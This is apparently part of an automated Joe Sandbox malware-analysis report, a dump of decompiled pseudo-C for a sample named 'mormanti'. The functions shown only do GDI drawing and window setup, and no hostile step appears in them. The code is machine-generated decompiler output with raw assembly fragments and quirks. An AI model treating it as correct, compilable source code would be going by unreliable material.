                                                                                                				 *0xc165c8 = CreateSolidBrush(0xa8e2ff);
                                                                                                				 *0xc165cc = CreateSolidBrush(0x99ff);
                                                                                                				 *0xc165d0 = CreateSolidBrush(0x40ab76);
                                                                                                				 *0xc165cc = CreateSolidBrush(0x8e48);
                                                                                                				E00C11741(0xc165f4, _t21 & 0xfffffff8, _t25, _a4, _a8);
                                                                                                				return E00C11741(0xc16610, _t21 & 0xfffffff8, _t25, _a4, _a8);
                                                                                                			}






                                                                                                0x00c11138
                                                                                                0x00c11156
                                                                                                0x00c11162
                                                                                                0x00c1116e
                                                                                                0x00c1117a
                                                                                                0x00c11186
                                                                                                0x00c11198
                                                                                                0x00c1119d
                                                                                                0x00c111b9

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00C11131
                                                                                                • srand.MSVCR90 ref: 00C11138
                                                                                                • CreatePen.GDI32(00000000,00000003,00000000), ref: 00C11145
                                                                                                • CreateSolidBrush.GDI32(00EDEDED), ref: 00C1115B
                                                                                                • CreateSolidBrush.GDI32(00A8E2FF), ref: 00C11167
                                                                                                • CreateSolidBrush.GDI32(000099FF), ref: 00C11173
                                                                                                • CreateSolidBrush.GDI32(0040AB76), ref: 00C1117F
                                                                                                • CreateSolidBrush.GDI32(00008E48), ref: 00C1118B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create$BrushSolid$CountTicksrand
                                                                                                • String ID:
                                                                                                • API String ID: 3112745008-0
                                                                                                • Opcode ID: e35bdb79114558b74c8cfe15e3843ce4edfd52731dc7b6d23623fd68cbbd6d1f
                                                                                                • Instruction ID: c65e77752282c805f34c7820c4ec4dc988d71f79a50afa4e1394c01f293f3fd9
                                                                                                • Opcode Fuzzy Hash: e35bdb79114558b74c8cfe15e3843ce4edfd52731dc7b6d23623fd68cbbd6d1f
                                                                                                • Instruction Fuzzy Hash: A2012871D40324ABDB106FB1AC0EBCD3E6AFB06760F048567FA18AB2E0EA755550DF84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E00C11A1F(void* __ecx) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t82;
                                                                                                				signed int _t90;
                                                                                                				intOrPtr* _t91;
                                                                                                				void* _t103;
                                                                                                				int _t105;
                                                                                                				unsigned int _t108;
                                                                                                				intOrPtr _t118;
                                                                                                				int _t129;
                                                                                                				struct HDC__* _t130;
                                                                                                				void* _t131;
                                                                                                				signed int _t134;
                                                                                                				intOrPtr _t135;
                                                                                                				intOrPtr _t136;
                                                                                                				int _t137;
                                                                                                				signed int _t138;
                                                                                                				void* _t139;
                                                                                                				void* _t140;
                                                                                                				signed int _t141;
                                                                                                				void* _t143;
                                                                                                
                                                                                                				_t141 = _t143 - 0x70;
                                                                                                				_t82 =  *0xc16018; // 0x649a0353
                                                                                                				 *(_t141 + 0x6c) = _t82 ^ _t141;
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				 *(_t141 + 0x60) =  *(_t141 + 0x78);
                                                                                                				asm("movsd");
                                                                                                				OffsetRect(_t141 + 0x48,  ~( *(_t141 + 0x48)), 0);
                                                                                                				_t129 =  *(_t141 + 0x50);
                                                                                                				_t134 = 3;
                                                                                                				asm("cdq");
                                                                                                				_t90 = _t129 / _t134;
                                                                                                				_t105 =  *(_t141 + 0x54);
                                                                                                				_t135 = 2;
                                                                                                				 *((intOrPtr*)(_t141 - 0x20)) = _t135;
                                                                                                				 *((intOrPtr*)(_t141 - 0x18)) = _t135;
                                                                                                				_t136 = 6;
                                                                                                				 *((intOrPtr*)(_t141 - 8)) = _t136;
                                                                                                				 *_t141 = _t136;
                                                                                                				_t137 =  *(_t141 + 0x4c);
                                                                                                				 *(_t141 + 0xc) = _t137;
                                                                                                				 *(_t141 + 0x14) = _t137;
                                                                                                				 *(_t141 + 0x2c) = _t137;
                                                                                                				 *(_t141 + 0x34) = _t137;
                                                                                                				 *(_t141 + 0x5c) = _t129;
                                                                                                				 *(_t141 + 0x58) = _t105;
                                                                                                				 *((intOrPtr*)(_t141 - 0x28)) = 0;
                                                                                                				 *((intOrPtr*)(_t141 - 0x24)) = 1;
                                                                                                				 *((intOrPtr*)(_t141 - 0x1c)) = 0;
                                                                                                				 *((intOrPtr*)(_t141 - 0x14)) = 3;
                                                                                                				 *((intOrPtr*)(_t141 - 0x10)) = 4;
                                                                                                				 *((intOrPtr*)(_t141 - 0xc)) = 5;
                                                                                                				 *((intOrPtr*)(_t141 - 4)) = 4;
                                                                                                				 *((intOrPtr*)(_t141 + 4)) = 7;
                                                                                                				_t118 = _t90 + _t90;
                                                                                                				 *(_t141 + 8) = _t90;
                                                                                                				 *(_t141 + 0x18) = _t90;
                                                                                                				 *(_t141 + 0x40) = _t90;
                                                                                                				 *((intOrPtr*)(_t141 + 0x10)) = _t118;
                                                                                                				 *(_t141 + 0x1c) = _t105;
                                                                                                				 *((intOrPtr*)(_t141 + 0x20)) = 0;
                                                                                                				 *(_t141 + 0x24) = _t105;
                                                                                                				 *((intOrPtr*)(_t141 + 0x28)) = _t118;
                                                                                                				 *(_t141 + 0x30) = _t129;
                                                                                                				 *((intOrPtr*)(_t141 + 0x38)) = _t118;
                                                                                                				 *(_t141 + 0x3c) = _t105;
                                                                                                				 *(_t141 + 0x44) = _t105;
                                                                                                				 *((char*)(_t141 + 0x64)) = 0;
                                                                                                				 *((char*)(_t141 + 0x65)) = 1;
                                                                                                				 *((char*)(_t141 + 0x66)) = 1;
                                                                                                				 *((char*)(_t141 + 0x67)) = 0;
                                                                                                				 *((char*)(_t141 + 0x68)) = 1;
                                                                                                				 *((char*)(_t141 + 0x69)) = 0;
                                                                                                				 *((char*)(_t141 + 0x6a)) = 0;
                                                                                                				 *((char*)(_t141 + 0x6b)) = 1;
                                                                                                				_t138 = 0;
                                                                                                				_t91 = _t141 - 0xa4;
                                                                                                				do {
                                                                                                					asm("sbb ecx, ecx");
                                                                                                					_t108 =  ~( *(_t141 + _t138 + 0x64) & 0x000000ff) &  *(_t141 + 0x7c);
                                                                                                					 *((intOrPtr*)(_t91 - 4)) =  *((intOrPtr*)(_t141 + 8 + _t138 * 8));
                                                                                                					 *_t91 =  *((intOrPtr*)(_t141 + 0xc + _t138 * 8));
                                                                                                					 *(_t91 + 4) = (_t108 & 0x000000ff) << 8;
                                                                                                					 *(_t91 + 8) = (_t108 >> 0x00000010 & 0x000000ff) << 8;
                                                                                                					_t126 = (_t108 >> 0x00000008 & 0x000000ff) << 8;
                                                                                                					asm("sbb ecx, ecx");
                                                                                                					 *(_t91 + 6) = (_t108 >> 0x00000008 & 0x000000ff) << 8;
                                                                                                					 *((short*)(_t91 + 0xa)) =  ~( *(_t141 + _t138 + 0x64) & 0x000000ff) & 0x0000ff00;
                                                                                                					_t138 = _t138 + 1;
                                                                                                					_t91 = _t91 + 0x10;
                                                                                                				} while (_t138 < 8);
                                                                                                				_t130 = CreateCompatibleDC( *(_t141 + 0x60));
                                                                                                				_t139 = CreateCompatibleBitmap( *(_t141 + 0x60),  *(_t141 + 0x5c),  *(_t141 + 0x58));
                                                                                                				SelectObject(_t130, _t139);
                                                                                                				BitBlt(_t130, 0, 0,  *(_t141 + 0x5c),  *(_t141 + 0x58),  *(_t141 + 0x60),  *(_t141 + 0x48),  *(_t141 + 0x4c), 0x42);
                                                                                                				__imp__GradientFill(_t141 - 0xa8, _t141 - 0x28, 4, 2);
                                                                                                				DeleteDC(_t130);
                                                                                                				_t131 = _t130;
                                                                                                				 *0xc165d8 = _t139;
                                                                                                				_pop(_t140);
                                                                                                				_t103 = 8;
                                                                                                				return E00C1272C(_t139, _t103,  *(_t141 + 0x6c) ^ _t141, _t126, _t131, _t140);
                                                                                                			}

























                                                                                                0x00c11a20
                                                                                                0x00c11a2a
                                                                                                0x00c11a31
                                                                                                0x00c11a3f
                                                                                                0x00c11a40
                                                                                                0x00c11a41
                                                                                                0x00c11a42
                                                                                                0x00c11a45
                                                                                                0x00c11a53
                                                                                                0x00c11a59
                                                                                                0x00c11a5e
                                                                                                0x00c11a61
                                                                                                0x00c11a62
                                                                                                0x00c11a64
                                                                                                0x00c11a69
                                                                                                0x00c11a6a
                                                                                                0x00c11a6d
                                                                                                0x00c11a72
                                                                                                0x00c11a73
                                                                                                0x00c11a76
                                                                                                0x00c11a79
                                                                                                0x00c11a7c
                                                                                                0x00c11a7f
                                                                                                0x00c11a82
                                                                                                0x00c11a85
                                                                                                0x00c11a88
                                                                                                0x00c11a8b
                                                                                                0x00c11a8e
                                                                                                0x00c11a91
                                                                                                0x00c11a98
                                                                                                0x00c11a9b
                                                                                                0x00c11aa2
                                                                                                0x00c11aa9
                                                                                                0x00c11ab0
                                                                                                0x00c11ab7
                                                                                                0x00c11abe
                                                                                                0x00c11ac1
                                                                                                0x00c11ac4
                                                                                                0x00c11ac7
                                                                                                0x00c11aca
                                                                                                0x00c11acd
                                                                                                0x00c11ad0
                                                                                                0x00c11ad3
                                                                                                0x00c11ad6
                                                                                                0x00c11ad9
                                                                                                0x00c11adc
                                                                                                0x00c11adf
                                                                                                0x00c11ae2
                                                                                                0x00c11ae5
                                                                                                0x00c11ae8
                                                                                                0x00c11aec
                                                                                                0x00c11af0
                                                                                                0x00c11af3
                                                                                                0x00c11af7
                                                                                                0x00c11afa
                                                                                                0x00c11afd
                                                                                                0x00c11b01
                                                                                                0x00c11b03
                                                                                                0x00c11b09
                                                                                                0x00c11b14
                                                                                                0x00c11b16
                                                                                                0x00c11b19
                                                                                                0x00c11b20
                                                                                                0x00c11b2a
                                                                                                0x00c11b3e
                                                                                                0x00c11b4b
                                                                                                0x00c11b51
                                                                                                0x00c11b59
                                                                                                0x00c11b5d
                                                                                                0x00c11b61
                                                                                                0x00c11b62
                                                                                                0x00c11b65
                                                                                                0x00c11b76
                                                                                                0x00c11b84
                                                                                                0x00c11b88
                                                                                                0x00c11ba2
                                                                                                0x00c11bba
                                                                                                0x00c11bc1
                                                                                                0x00c11bca
                                                                                                0x00c11bcb
                                                                                                0x00c11bd3
                                                                                                0x00c11bd6
                                                                                                0x00c11be0

                                                                                                APIs
                                                                                                • OffsetRect.USER32(?,?,00000000), ref: 00C11A53
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00C11B6D
                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C11B7E
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00C11B88
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00000042), ref: 00C11BA2
                                                                                                • GradientFill.MSIMG32(00000000,?,00000008,?,00000004,00000002,?,?), ref: 00C11BBA
                                                                                                • DeleteDC.GDI32(00000000), ref: 00C11BC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: CompatibleCreate$BitmapDeleteFillGradientObjectOffsetRectSelect
                                                                                                • String ID:
                                                                                                • API String ID: 4124605331-0
                                                                                                • Opcode ID: 57071b3482c0c9a1cee6c78ce55a6ab5514b97d9cff3b1c63068fdae965287c9
                                                                                                • Instruction ID: fc060744ad11bba9490da60f450aee10bb29b981e9e5e641198131dae4f76e36
                                                                                                • Opcode Fuzzy Hash: 57071b3482c0c9a1cee6c78ce55a6ab5514b97d9cff3b1c63068fdae965287c9
                                                                                                • Instruction Fuzzy Hash: 905134B19103589FDB09DFA9C844AEE7FA9FF0A304F01816AFE1997260D3B58944DB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00C1186A(intOrPtr* __eax, struct HDC__* _a4, struct HRGN__* _a8, char _a12, signed int _a16, signed int _a24) {
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				int _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				char _v32;
                                                                                                				void* __esi;
                                                                                                				char _t48;
                                                                                                				intOrPtr _t53;
                                                                                                				int _t56;
                                                                                                				int _t58;
                                                                                                				int _t60;
                                                                                                				int _t66;
                                                                                                				int _t68;
                                                                                                				int _t70;
                                                                                                				void* _t73;
                                                                                                				intOrPtr* _t74;
                                                                                                				intOrPtr* _t75;
                                                                                                				char _t76;
                                                                                                
                                                                                                				_t75 = __eax;
                                                                                                				_v24 = SaveDC(_a4);
                                                                                                				SelectClipRgn(_a4, _a8);
                                                                                                				_t74 =  *((intOrPtr*)(_t75 + 0x14));
                                                                                                				_t76 =  *_t75;
                                                                                                				_v28 =  *_t74;
                                                                                                				_v12 = _t76;
                                                                                                				_v32 = _t76;
                                                                                                				while(1) {
                                                                                                					_t48 = _v32;
                                                                                                					if(_t48 == 0 || _t48 != _v12) {
                                                                                                						__imp___invalid_parameter_noinfo();
                                                                                                					}
                                                                                                					if(_v28 == _t74) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t77 =  &_v32;
                                                                                                					SelectObject(_a4,  *(E00C11DF8( &_v32) + 0x20));
                                                                                                					_t73 = E00C11DF8( &_v32);
                                                                                                					_t53 = E00C11DF8(_t77);
                                                                                                					if(_a12 == 0) {
                                                                                                						_v20 = _t53;
                                                                                                						_v16 = E00C11DF8(_t77);
                                                                                                						_t56 = E00C13140(E00C11DF8( &_v32),  *(_t73 + 0x18) * _a24);
                                                                                                						_t58 = E00C13140(_v20,  *(_v20 + 0x10) * _a16);
                                                                                                						_t60 = E00C13140(_v16,  *(_v16 + 8) * _a24);
                                                                                                						Rectangle(_a4, E00C13140(_t60,  *_t55 * _a16), _t60, _t58, _t56);
                                                                                                					} else {
                                                                                                						_v16 = _t53;
                                                                                                						_v20 = E00C11DF8(_t77);
                                                                                                						_t66 = E00C13140(E00C11DF8(_t77),  *(_t73 + 0x18) * _a24);
                                                                                                						_t68 = E00C13140(_v16,  *(_v16 + 0x10) * _a16);
                                                                                                						_t70 = E00C13140(_v20,  *(_v20 + 8) * _a24);
                                                                                                						Ellipse(_a4, E00C13140(_t70,  *_t65 * _a16), _t70, _t68, _t66);
                                                                                                					}
                                                                                                					E00C11C99( &_v32);
                                                                                                				}
                                                                                                				return RestoreDC(_a4, _v24);
                                                                                                			}






















                                                                                                0x00c11876
                                                                                                0x00c11881
                                                                                                0x00c11887
                                                                                                0x00c1188d
                                                                                                0x00c11890
                                                                                                0x00c11894
                                                                                                0x00c11897
                                                                                                0x00c1189a
                                                                                                0x00c1189d
                                                                                                0x00c1189d
                                                                                                0x00c118a2
                                                                                                0x00c118a9
                                                                                                0x00c118a9
                                                                                                0x00c118b2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c118b8
                                                                                                0x00c118c6
                                                                                                0x00c118d1
                                                                                                0x00c118d3
                                                                                                0x00c118dc
                                                                                                0x00c11930
                                                                                                0x00c1193b
                                                                                                0x00c1194b
                                                                                                0x00c1195a
                                                                                                0x00c11969
                                                                                                0x00c1197d
                                                                                                0x00c118de
                                                                                                0x00c118de
                                                                                                0x00c118e6
                                                                                                0x00c118f6
                                                                                                0x00c11905
                                                                                                0x00c11914
                                                                                                0x00c11928
                                                                                                0x00c11928
                                                                                                0x00c11986
                                                                                                0x00c11986
                                                                                                0x00c119a0

                                                                                                APIs
                                                                                                • SaveDC.GDI32(?), ref: 00C11878
                                                                                                • SelectClipRgn.GDI32(?,?), ref: 00C11887
                                                                                                • _invalid_parameter_noinfo.MSVCR90 ref: 00C118A9
                                                                                                • SelectObject.GDI32(?,?), ref: 00C118C6
                                                                                                • Ellipse.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C11928
                                                                                                • Rectangle.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C1197D
                                                                                                • RestoreDC.GDI32(?,?), ref: 00C11996
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: Select$ClipEllipseObjectRectangleRestoreSave_invalid_parameter_noinfo
                                                                                                • String ID:
                                                                                                • API String ID: 996756098-0
                                                                                                • Opcode ID: 3ee6ee41c2798373aeb58f8ef2757a44bdd32116ec9afa31071dbd95e3542ad2
                                                                                                • Instruction ID: 9659c94d980c062ec24f155ca50f4c2e7371e986b3b6a2ea7278e0dfa350c62d
                                                                                                • Opcode Fuzzy Hash: 3ee6ee41c2798373aeb58f8ef2757a44bdd32116ec9afa31071dbd95e3542ad2
                                                                                                • Instruction Fuzzy Hash: A9413571D0021AEBCF00AFA5EC0AADEBB74FF09750B168551F951B3121CB34DAA5EB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C123C4(struct HINSTANCE__* __eax) {
                                                                                                				struct _WNDCLASSEXW _v52;
                                                                                                
                                                                                                				_v52.cbClsExtra = _v52.cbClsExtra & 0x00000000;
                                                                                                				_v52.cbWndExtra = _v52.cbWndExtra & 0x00000000;
                                                                                                				_v52.cbSize = 0x30;
                                                                                                				_v52.style = 3;
                                                                                                				_v52.lpfnWndProc = E00C124A9;
                                                                                                				_v52.hInstance = __eax;
                                                                                                				_v52.hIcon = LoadIconW(__eax, 0x6b);
                                                                                                				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                                                                				_v52.hbrBackground = 6;
                                                                                                				_v52.lpszMenuName = 0x6d;
                                                                                                				_v52.lpszClassName = 0xc16410;
                                                                                                				_v52.hIconSm = LoadIconW(_v52.hInstance, 0x6c);
                                                                                                				return RegisterClassExW( &_v52);
                                                                                                			}




                                                                                                0x00c123ca
                                                                                                0x00c123ce
                                                                                                0x00c123dc
                                                                                                0x00c123e3
                                                                                                0x00c123ea
                                                                                                0x00c123f1
                                                                                                0x00c123fd
                                                                                                0x00c1240b
                                                                                                0x00c1240e
                                                                                                0x00c12415
                                                                                                0x00c1241c
                                                                                                0x00c12425
                                                                                                0x00c12434

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Icon$ClassCursorRegister
                                                                                                • String ID: 0$m
                                                                                                • API String ID: 4202395251-432128193
                                                                                                • Opcode ID: f64d465029403c2fe231957b837f7dabcabf48fdaa770dd28da0aaa7628ece1a
                                                                                                • Instruction ID: 141681633313b37b3a6593eae1cbe7db6ffe05ed49c4d8ba25b28c89c954e453
                                                                                                • Opcode Fuzzy Hash: f64d465029403c2fe231957b837f7dabcabf48fdaa770dd28da0aaa7628ece1a
                                                                                                • Instruction Fuzzy Hash: 770114B1C10219ABEF009FE4DC09BDEBFB8BB09315F10841AE510B6281D7B916548FA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E00C11772(unsigned int __eax, signed long long* __edi, signed long long __fp0, unsigned int _a4) {
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v24;
                                                                                                				signed long long _v32;
                                                                                                				signed long long _v40;
                                                                                                				signed int _t49;
                                                                                                				unsigned int _t51;
                                                                                                				signed int _t52;
                                                                                                				signed int _t54;
                                                                                                				void* _t56;
                                                                                                				unsigned int _t57;
                                                                                                				signed int _t67;
                                                                                                				signed int _t69;
                                                                                                				signed int _t71;
                                                                                                				signed int _t75;
                                                                                                				void* _t76;
                                                                                                				void* _t77;
                                                                                                				void* _t78;
                                                                                                				signed long long* _t80;
                                                                                                				signed long long _t92;
                                                                                                
                                                                                                				_t91 = __fp0;
                                                                                                				_t80 = __edi;
                                                                                                				_t57 = __eax;
                                                                                                				_t69 = rand() % ((_a4 >> 1) - 1);
                                                                                                				_v12 = _t69;
                                                                                                				asm("fild dword [ebp-0x8]");
                                                                                                				if(_t69 < 0) {
                                                                                                					_t91 = __fp0 +  *0xc14438;
                                                                                                				}
                                                                                                				_v32 = _t91;
                                                                                                				_t71 = rand() % ((_t57 >> 1) - 1);
                                                                                                				_v12 = _t71;
                                                                                                				asm("fild dword [ebp-0x8]");
                                                                                                				if(_t71 < 0) {
                                                                                                					_t91 = _t91 +  *0xc14438;
                                                                                                				}
                                                                                                				_v40 = _t91;
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				if(_a4 < 0) {
                                                                                                					_t91 = _t91 +  *0xc14438;
                                                                                                				}
                                                                                                				_v16 = _t91;
                                                                                                				_t49 = rand();
                                                                                                				asm("cdq");
                                                                                                				_t51 = _t57;
                                                                                                				_a4 = _t49 % (_a4 - 1);
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				_a4 = _t51;
                                                                                                				_t92 = _t91 / _v16;
                                                                                                				 *_t80 = _t92;
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				if(_t51 < 0) {
                                                                                                					_t92 = _t92 +  *0xc14438;
                                                                                                				}
                                                                                                				_v24 = _t92;
                                                                                                				_t52 = rand();
                                                                                                				asm("cdq");
                                                                                                				_a4 = _t52 % (_t57 - 1);
                                                                                                				asm("fild dword [ebp+0x8]");
                                                                                                				_t80[1] = _t92 / _v24;
                                                                                                				_t80[2] = _v32 / _v16;
                                                                                                				_t80[3] = _v40 / _v24;
                                                                                                				_t54 = rand();
                                                                                                				asm("cdq");
                                                                                                				_t67 = 5;
                                                                                                				_t75 = _t54 % _t67;
                                                                                                				if(_t75 == 0) {
                                                                                                					_t56 =  *0xc165c4; // 0x0
                                                                                                				} else {
                                                                                                					_t76 = _t75 - 1;
                                                                                                					if(_t76 == 0) {
                                                                                                						_t56 =  *0xc165c8; // 0x0
                                                                                                					} else {
                                                                                                						_t77 = _t76 - 1;
                                                                                                						if(_t77 == 0) {
                                                                                                							_t56 =  *0xc165cc; // 0x0
                                                                                                						} else {
                                                                                                							_t78 = _t77 - 1;
                                                                                                							if(_t78 == 0) {
                                                                                                								_t56 =  *0xc165d0; // 0x0
                                                                                                							} else {
                                                                                                								if(_t78 == 1) {
                                                                                                									_t56 =  *0xc165d4; // 0x0
                                                                                                								} else {
                                                                                                									_t56 = GetStockObject(0);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t80[4] = _t56;
                                                                                                				return _t56;
                                                                                                			}























                                                                                                0x00c11772
                                                                                                0x00c11772
                                                                                                0x00c11780
                                                                                                0x00c1178c
                                                                                                0x00c1178e
                                                                                                0x00c11791
                                                                                                0x00c11796
                                                                                                0x00c11798
                                                                                                0x00c11798
                                                                                                0x00c1179e
                                                                                                0x00c117aa
                                                                                                0x00c117ac
                                                                                                0x00c117af
                                                                                                0x00c117b4
                                                                                                0x00c117b6
                                                                                                0x00c117b6
                                                                                                0x00c117bf
                                                                                                0x00c117c2
                                                                                                0x00c117c7
                                                                                                0x00c117c9
                                                                                                0x00c117c9
                                                                                                0x00c117cf
                                                                                                0x00c117d2
                                                                                                0x00c117d7
                                                                                                0x00c117db
                                                                                                0x00c117dd
                                                                                                0x00c117e0
                                                                                                0x00c117e3
                                                                                                0x00c117e6
                                                                                                0x00c117e9
                                                                                                0x00c117eb
                                                                                                0x00c117f0
                                                                                                0x00c117f2
                                                                                                0x00c117f2
                                                                                                0x00c117f8
                                                                                                0x00c117fb
                                                                                                0x00c117fd
                                                                                                0x00c11801
                                                                                                0x00c11804
                                                                                                0x00c1180a
                                                                                                0x00c11813
                                                                                                0x00c1181c
                                                                                                0x00c1181f
                                                                                                0x00c11823
                                                                                                0x00c11824
                                                                                                0x00c11827
                                                                                                0x00c1182a
                                                                                                0x00c1185e
                                                                                                0x00c1182c
                                                                                                0x00c1182c
                                                                                                0x00c1182d
                                                                                                0x00c11857
                                                                                                0x00c1182f
                                                                                                0x00c1182f
                                                                                                0x00c11830
                                                                                                0x00c11850
                                                                                                0x00c11832
                                                                                                0x00c11832
                                                                                                0x00c11833
                                                                                                0x00c11849
                                                                                                0x00c11835
                                                                                                0x00c11836
                                                                                                0x00c11842
                                                                                                0x00c11838
                                                                                                0x00c1183a
                                                                                                0x00c1183a
                                                                                                0x00c11836
                                                                                                0x00c11833
                                                                                                0x00c11830
                                                                                                0x00c1182d
                                                                                                0x00c11864
                                                                                                0x00c11869

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: rand$ObjectStock
                                                                                                • String ID:
                                                                                                • API String ID: 2053096085-0
                                                                                                • Opcode ID: 819f3d62ee0b8f6cf48ad670f3b638b13b9617d09058176fc58f79ccc57ea27f
                                                                                                • Instruction ID: e7643493a13bb53a671e8a5066dac4c0687e14cdfff3b9327c012c254a12d23a
                                                                                                • Opcode Fuzzy Hash: 819f3d62ee0b8f6cf48ad670f3b638b13b9617d09058176fc58f79ccc57ea27f
                                                                                                • Instruction Fuzzy Hash: FE319130E08919E7DB089F5AE8847ECBFB6FB86300F66C059D945561C0DB719EE0EB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C11271(struct HWND__* _a4) {
                                                                                                				struct tagRECT _v20;
                                                                                                				struct HDC__* _t9;
                                                                                                				void* _t14;
                                                                                                				struct HDC__* _t17;
                                                                                                				struct HDC__* _t19;
                                                                                                
                                                                                                				_t9 =  *0xc165a0; // 0x0
                                                                                                				if(_t9 == 0) {
                                                                                                					GetClientRect(_a4,  &_v20);
                                                                                                					_t19 = GetDC(_a4);
                                                                                                					 *0xc165a0 = CreateCompatibleDC(_t19);
                                                                                                					_t14 = CreateCompatibleBitmap(_t19, _v20.right - _v20.left, _v20.bottom - _v20.top);
                                                                                                					 *0xc165a4 = _t14;
                                                                                                					SelectObject( *0xc165a0, _t14);
                                                                                                					ReleaseDC(_a4, _t19);
                                                                                                					_t17 =  *0xc165a0; // 0x0
                                                                                                					return _t17;
                                                                                                				}
                                                                                                				return _t9;
                                                                                                			}








                                                                                                0x00c11274
                                                                                                0x00c1127e
                                                                                                0x00c1128a
                                                                                                0x00c112a5
                                                                                                0x00c112b1
                                                                                                0x00c112b6
                                                                                                0x00c112c3
                                                                                                0x00c112c8
                                                                                                0x00c112d2
                                                                                                0x00c112d8
                                                                                                0x00000000
                                                                                                0x00c112df
                                                                                                0x00c112e1

                                                                                                APIs
                                                                                                • GetClientRect.USER32 ref: 00C1128A
                                                                                                • GetDC.USER32(?), ref: 00C1129F
                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00C112A8
                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C112B6
                                                                                                • SelectObject.GDI32(00000000), ref: 00C112C8
                                                                                                • ReleaseDC.USER32 ref: 00C112D2
                                                                                                Memory Dump Source
